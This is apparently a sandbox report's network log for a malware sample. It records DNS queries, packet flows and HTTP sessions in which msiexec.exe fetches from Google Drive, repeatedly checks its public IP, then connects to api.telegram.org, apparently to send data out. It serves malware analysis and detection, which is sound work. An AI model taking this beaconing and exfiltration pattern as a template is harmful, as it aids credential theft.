                                                                                                                                                                          Mar 7, 2025 16:21:05.761809111 CET8049699132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:05.763313055 CET49700443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:05.763360023 CET44349700104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:05.763472080 CET49700443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:05.763736963 CET49700443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:05.763751030 CET44349700104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:05.810612917 CET4969980192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:07.973411083 CET44349700104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:07.975301981 CET49700443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:07.975323915 CET44349700104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:08.495656013 CET44349700104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:08.532790899 CET44349700104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:08.532912970 CET49700443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:08.533297062 CET49700443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:08.537719011 CET4970180192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:08.542889118 CET8049701132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:08.542998075 CET4970180192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:08.543127060 CET4970180192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:08.548258066 CET8049701132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:09.273799896 CET8049701132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:09.275434017 CET49702443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:09.275490046 CET44349702104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:09.275569916 CET49702443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:09.275829077 CET49702443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:09.275846004 CET44349702104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:09.326167107 CET4970180192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:11.438119888 CET44349702104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:11.439862013 CET49702443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:11.439888954 CET44349702104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:11.979815006 CET44349702104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:12.025126934 CET44349702104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:12.025289059 CET49702443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:12.025669098 CET49702443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:12.029587030 CET4970180192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:12.030663013 CET4970380192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:12.036077023 CET8049701132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:12.036132097 CET4970180192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:12.036530972 CET8049703132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:12.036607981 CET4970380192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:12.036703110 CET4970380192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:12.041688919 CET8049703132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:12.755656958 CET8049703132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:12.757117987 CET49704443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:12.757162094 CET44349704104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:12.757244110 CET49704443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:12.757471085 CET49704443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:12.757492065 CET44349704104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:12.810595989 CET4970380192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:15.040348053 CET44349704104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:15.042181969 CET49704443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:15.042270899 CET44349704104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:15.592714071 CET44349704104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:15.631144047 CET44349704104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:15.631289005 CET49704443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:15.631957054 CET49704443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:15.639472008 CET4970380192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:15.640551090 CET4970580192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:15.644963026 CET8049703132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:15.645042896 CET4970380192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:15.645579100 CET8049705132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:15.645644903 CET4970580192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:15.645728111 CET4970580192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:15.650693893 CET8049705132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:16.371177912 CET8049705132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:16.373804092 CET49706443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:16.373847961 CET44349706104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:16.374066114 CET49706443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:16.374433994 CET49706443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:16.374445915 CET44349706104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:16.420027018 CET4970580192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:18.400126934 CET44349706104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:18.401789904 CET49706443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:18.401823044 CET44349706104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:18.982769012 CET44349706104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:18.985551119 CET44349706104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:18.985630035 CET49706443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:18.986140966 CET49706443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:18.990122080 CET4970580192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:18.991092920 CET4970780192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:18.995568991 CET8049705132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:18.995660067 CET4970580192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:18.996140957 CET8049707132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:18.996325016 CET4970780192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:18.996409893 CET4970780192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:19.002094984 CET8049707132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:19.715512991 CET8049707132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:19.736429930 CET49708443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:19.736491919 CET44349708104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:19.736601114 CET49708443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:19.740844965 CET49708443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:19.740865946 CET44349708104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:19.763731956 CET4970780192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:22.209135056 CET44349708104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:22.210711956 CET49708443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:22.210760117 CET44349708104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:22.728657961 CET44349708104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:22.775266886 CET44349708104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:22.775352001 CET49708443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:22.775706053 CET49708443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:22.804600000 CET4970780192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:22.809864998 CET8049707132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:22.809921980 CET4970780192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:22.813340902 CET49709443192.168.2.8149.154.167.220
                                                                                                                                                                          Mar 7, 2025 16:21:22.813395023 CET44349709149.154.167.220192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:22.813460112 CET49709443192.168.2.8149.154.167.220
                                                                                                                                                                          Mar 7, 2025 16:21:22.813910007 CET49709443192.168.2.8149.154.167.220
                                                                                                                                                                          Mar 7, 2025 16:21:22.813927889 CET44349709149.154.167.220192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:25.441836119 CET44349709149.154.167.220192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:25.441973925 CET49709443192.168.2.8149.154.167.220
                                                                                                                                                                          Mar 7, 2025 16:21:25.443810940 CET49709443192.168.2.8149.154.167.220
                                                                                                                                                                          Mar 7, 2025 16:21:25.443829060 CET44349709149.154.167.220192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:25.444122076 CET44349709149.154.167.220192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:25.445548058 CET49709443192.168.2.8149.154.167.220
                                                                                                                                                                          Mar 7, 2025 16:21:25.492336035 CET44349709149.154.167.220192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:26.055880070 CET44349709149.154.167.220192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:26.055937052 CET44349709149.154.167.220192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:26.056046963 CET49709443192.168.2.8149.154.167.220
                                                                                                                                                                          Mar 7, 2025 16:21:26.058531046 CET49709443192.168.2.8149.154.167.220
                                                                                                                                                                          Mar 7, 2025 16:21:32.643204927 CET4969980192.168.2.8132.226.247.73

                                                                                                                                                                          UDP Packets

                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Mar 7, 2025 16:20:41.273633957 CET4975253192.168.2.81.1.1.1
                                                                                                                                                                          Mar 7, 2025 16:20:41.280874968 CET53497521.1.1.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:44.442312956 CET5162153192.168.2.81.1.1.1
                                                                                                                                                                          Mar 7, 2025 16:20:44.449320078 CET53516211.1.1.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:51.120187044 CET5507553192.168.2.81.1.1.1
                                                                                                                                                                          Mar 7, 2025 16:20:51.128155947 CET53550751.1.1.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:52.361541033 CET6175853192.168.2.81.1.1.1
                                                                                                                                                                          Mar 7, 2025 16:20:52.371618032 CET53617581.1.1.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:22.805269003 CET5357253192.168.2.81.1.1.1
                                                                                                                                                                          Mar 7, 2025 16:21:22.812621117 CET53535721.1.1.1192.168.2.8

                                                                                                                                                                          DNS Queries

                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                          Mar 7, 2025 16:20:41.273633957 CET192.168.2.81.1.1.10x760cStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:44.442312956 CET192.168.2.81.1.1.10x4631Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:51.120187044 CET192.168.2.81.1.1.10xd9e7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:52.361541033 CET192.168.2.81.1.1.10xba51Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:21:22.805269003 CET192.168.2.81.1.1.10x7178Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                                          DNS Answers

                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                          Mar 7, 2025 16:20:41.280874968 CET1.1.1.1192.168.2.80x760cNo error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:44.449320078 CET1.1.1.1192.168.2.80x4631No error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:51.128155947 CET1.1.1.1192.168.2.80xd9e7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:51.128155947 CET1.1.1.1192.168.2.80xd9e7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:51.128155947 CET1.1.1.1192.168.2.80xd9e7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:51.128155947 CET1.1.1.1192.168.2.80xd9e7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:51.128155947 CET1.1.1.1192.168.2.80xd9e7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:51.128155947 CET1.1.1.1192.168.2.80xd9e7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:52.371618032 CET1.1.1.1192.168.2.80xba51No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:52.371618032 CET1.1.1.1192.168.2.80xba51No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:52.371618032 CET1.1.1.1192.168.2.80xba51No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:52.371618032 CET1.1.1.1192.168.2.80xba51No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:52.371618032 CET1.1.1.1192.168.2.80xba51No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:52.371618032 CET1.1.1.1192.168.2.80xba51No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:20:52.371618032 CET1.1.1.1192.168.2.80xba51No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Mar 7, 2025 16:21:22.812621117 CET1.1.1.1192.168.2.80x7178No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                          • drive.google.com
                                                                                                                                                                          • drive.usercontent.google.com
                                                                                                                                                                          • reallyfreegeoip.org
                                                                                                                                                                          • api.telegram.org
                                                                                                                                                                          • checkip.dyndns.org

                                                                                                                                                                          HTTP Packets

                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          0192.168.2.849692132.226.247.73803488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Mar 7, 2025 16:20:51.137639999 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Mar 7, 2025 16:20:51.842865944 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:20:51 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                          Mar 7, 2025 16:20:51.846158028 CET127OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Mar 7, 2025 16:20:52.055900097 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:20:51 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                          Mar 7, 2025 16:20:55.240087986 CET127OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Mar 7, 2025 16:20:55.451503038 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:20:55 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          1192.168.2.849695132.226.247.73803488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Mar 7, 2025 16:20:58.226629972 CET127OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Mar 7, 2025 16:20:58.930313110 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:20:58 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          2192.168.2.849697132.226.247.73803488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Mar 7, 2025 16:21:01.542932987 CET127OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Mar 7, 2025 16:21:02.253025055 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:21:02 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          3192.168.2.849699132.226.247.73803488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Mar 7, 2025 16:21:05.052367926 CET127OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Mar 7, 2025 16:21:05.761809111 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:21:05 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          4192.168.2.849701132.226.247.73803488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Mar 7, 2025 16:21:08.543127060 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Mar 7, 2025 16:21:09.273799896 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:21:09 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          5192.168.2.849703132.226.247.73803488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Mar 7, 2025 16:21:12.036703110 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Mar 7, 2025 16:21:12.755656958 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:21:12 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          6192.168.2.849705132.226.247.73803488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Mar 7, 2025 16:21:15.645728111 CET151OUTGET / HTTP/1.1
